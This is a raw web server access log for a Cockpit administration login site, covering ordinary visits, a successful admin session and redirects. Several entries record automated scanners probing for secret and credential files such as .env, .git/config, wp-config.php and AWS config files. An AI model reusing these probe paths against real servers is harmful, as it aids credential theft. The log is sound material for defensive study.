[Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:39 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:39 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:39 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:39 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:44 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:44 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:44 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:44 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:44 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:44 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:44 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:45 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:45 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:45 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:45 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:45 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:45 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:45 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:45 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:45 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:45 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:45 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:45 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:45 +0000] - 301 301 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:38:09 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 37.76.10.148] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:38:09 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.js" [Client 37.76.10.148] [Length 16683] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:38:10 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.css" [Client 37.76.10.148] [Length 14139] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:38:10 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/branding.css" [Client 37.76.10.148] [Length 518] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:38:10 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/bg-plain.jpg" [Client 37.76.10.148] [Length 81737] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:38:10 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Regular.woff2" [Client 37.76.10.148] [Length 25844] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:38:10 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/logo.png" [Client 37.76.10.148] [Length 4420] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:38:10 +0000] - 401 401 - GET https terminal.profibot.hu "/cockpit/login" [Client 37.76.10.148] [Length 3244] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:38:10 +0000] - 200 200 - GET https terminal.profibot.hu "/favicon.ico" [Client 37.76.10.148] [Length 9662] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:38:10 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Medium.woff2" [Client 37.76.10.148] [Length 26880] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:01:04:23 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 144.126.196.189] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[29/Jan/2026:01:04:23 +0000] - - 301 - GET http terminal.profibot.hu "/favicon.ico" [Client 144.126.196.189] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "http://terminal.profibot.hu/" +[29/Jan/2026:01:04:23 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 144.126.196.189] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[29/Jan/2026:01:04:24 +0000] - 200 200 - GET https terminal.profibot.hu "/favicon.ico" [Client 144.126.196.189] [Length 9662] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://terminal.profibot.hu/" +[29/Jan/2026:02:06:06 +0000] - - 301 - GET http terminal.profibot.hu "/.git/HEAD" [Client 185.137.164.6] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Python-urllib/3.10" "-" +[29/Jan/2026:02:06:06 +0000] - 404 404 - GET https terminal.profibot.hu "/.git/HEAD" [Client 185.137.164.6] [Length 3226] [Gzip -] [Sent-to 192.168.100.43] "Python-urllib/3.10" "-" +[29/Jan/2026:03:56:48 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 23.27.145.50] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[29/Jan/2026:04:42:29 +0000] - 404 404 - GET https terminal.profibot.hu "/.git/config" [Client 45.148.10.238] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Camino/2.2a1pre" "-" +[29/Jan/2026:05:36:28 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 149.57.180.39] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[29/Jan/2026:05:37:30 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 195.178.110.132] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:05:37:30 +0000] - 404 404 - GET https terminal.profibot.hu "/.env" [Client 195.178.110.132] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:05:37:30 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.js" [Client 195.178.110.132] [Length 16683] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:05:37:30 +0000] - 404 404 - GET https terminal.profibot.hu "/%22cockpit/static/login.js%22" [Client 195.178.110.132] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:05:37:30 +0000] - 404 404 - GET https terminal.profibot.hu "/.env" [Client 195.178.110.132] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:05:37:30 +0000] - 404 404 - GET https terminal.profibot.hu "/.env.bak" [Client 195.178.110.132] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:05:37:30 +0000] - 404 404 - GET https terminal.profibot.hu "/.env.save" [Client 195.178.110.132] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[29/Jan/2026:05:37:30 +0000] - 200 200 - GET https terminal.profibot.hu "/backend/.env" [Client 195.178.110.132] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:05:37:30 +0000] - 200 200 - GET https terminal.profibot.hu "/admin/.env" [Client 195.178.110.132] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[29/Jan/2026:05:37:30 +0000] - 404 404 - GET https terminal.profibot.hu "/.git/config" [Client 195.178.110.132] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:05:37:31 +0000] - 404 404 - GET https terminal.profibot.hu "/wp-config.php" [Client 195.178.110.132] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:05:37:31 +0000] - 404 404 - GET https terminal.profibot.hu "/wp-config.php.old" [Client 195.178.110.132] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[29/Jan/2026:05:37:31 +0000] - 404 404 - GET https terminal.profibot.hu "/config.php" [Client 195.178.110.132] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:05:37:31 +0000] - 404 404 - GET https terminal.profibot.hu "/config.php.bak" [Client 195.178.110.132] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:05:37:31 +0000] - 404 404 - GET https terminal.profibot.hu "/config.js" [Client 195.178.110.132] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:05:37:31 +0000] - 404 404 - GET https terminal.profibot.hu "/aws-config.js" [Client 195.178.110.132] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:05:37:31 +0000] - 404 404 - GET https terminal.profibot.hu "/aws.config.js" [Client 195.178.110.132] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:26 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 84.1.26.27] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:26 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.js" [Client 84.1.26.27] [Length 16683] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:26 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/branding.css" [Client 84.1.26.27] [Length 518] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:26 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.css" [Client 84.1.26.27] [Length 14139] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:26 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/bg-plain.jpg" [Client 84.1.26.27] [Length 81737] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:26 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/logo.png" [Client 84.1.26.27] [Length 4420] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:26 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Regular.woff2" [Client 84.1.26.27] [Length 25844] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:26 +0000] - 200 200 - GET https terminal.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 9662] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:26 +0000] - 401 401 - GET https terminal.profibot.hu "/cockpit/login" [Client 84.1.26.27] [Length 3262] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:26 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Medium.woff2" [Client 84.1.26.27] [Length 26880] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:40 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/login" [Client 84.1.26.27] [Length 81] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:40 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 84.1.26.27] [Length 861] [Gzip 2.56] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/cockpit.js" [Client 84.1.26.27] [Length 16702] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/manifests.js" [Client 84.1.26.27] [Length 10180] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/shell/shell.css" [Client 84.1.26.27] [Length 140034] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:41 +0000] - 404 404 - GET https terminal.profibot.hu "/cockpit/@localhost/*/po.js" [Client 84.1.26.27] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:41 +0000] - 404 404 - GET https terminal.profibot.hu "/cockpit/@localhost/*/po.manifest.js" [Client 84.1.26.27] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/shell/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/shell/shell.js" [Client 84.1.26.27] [Length 202416] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 9662] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/updates/index.html" [Client 84.1.26.27] [Length 670] [Gzip 1.72] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/services.html" [Client 84.1.26.27] [Length 322] [Gzip 1.83] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/index.html" [Client 84.1.26.27] [Length 334] [Gzip 2.08] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 9662] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/services.css" [Client 84.1.26.27] [Length 135282] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/cockpit.js" [Client 84.1.26.27] [Length 16702] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/overview.css" [Client 84.1.26.27] [Length 77697] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/overview.js" [Client 84.1.26.27] [Length 322242] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" 